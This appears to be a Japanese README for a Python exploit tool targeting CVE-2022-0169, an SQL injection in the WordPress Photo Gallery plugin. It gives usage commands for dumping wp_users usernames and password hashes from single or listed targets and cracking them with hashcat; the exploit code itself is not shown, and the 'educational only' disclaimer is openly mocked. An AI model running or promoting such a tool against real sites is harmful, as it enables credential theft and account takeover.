
CVE-2022-0169 - WordPress写真ギャラリー SQLi PoC
これは、WordPress Photo GalleryプラグインのSQLインジェクション脆弱性であるCVE-2022-0169のためのシンプルなPython proof-of-concept(PoC)です。
admin-ajax.phpエンドポイントを悪用wp_usersのユーザー名とパスワードハッシュをダンプこのツールは教育目的のみです。責任を持って使用してください!まるでこれを聞くようにね.. 😆
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt
例:
python3 exploit.py -u http://victim.com -w /usr/share/wordlists/rockyou.txt
必要条件
requests
argparse
colorama
results/YYYYMMDD_HHMMSS/ に保存されますハッシュが見つかると、次のように尋ねられます:
Crack the hashes with hashcat now? [Y/N]:
Yを押すと、選択したワードリストを使用してhashcatが自動的に実行されます。
results/フォルダでダンプとハッシュを確認します。hashcat -m 400 -a 0 results/YYYYMMDD_HHMMSS/hashes.txt /usr/share/wordlists/rockyou.txt
このツールは教育および許可されたテストのみを目的としています。使用する責任はすべてあなたにあります。いかなるシステムのスキャンや悪用の前に必ず許可を得てください。
サイバーパンクであり続けよう。
— X3RX3S
| オプション | 説明 |
|---|
-u | 単一ターゲットのURL |
-f | ターゲットリストのファイル |
-p | プロキシ(例:http://127.0.0.1:8080) |
-t | スレッド数(デフォルト:5) |
-w | hashcat用のワードリストを選択(デフォルト:rockyou.txt)rockyou.txtがgunzipされていることを確認してください! |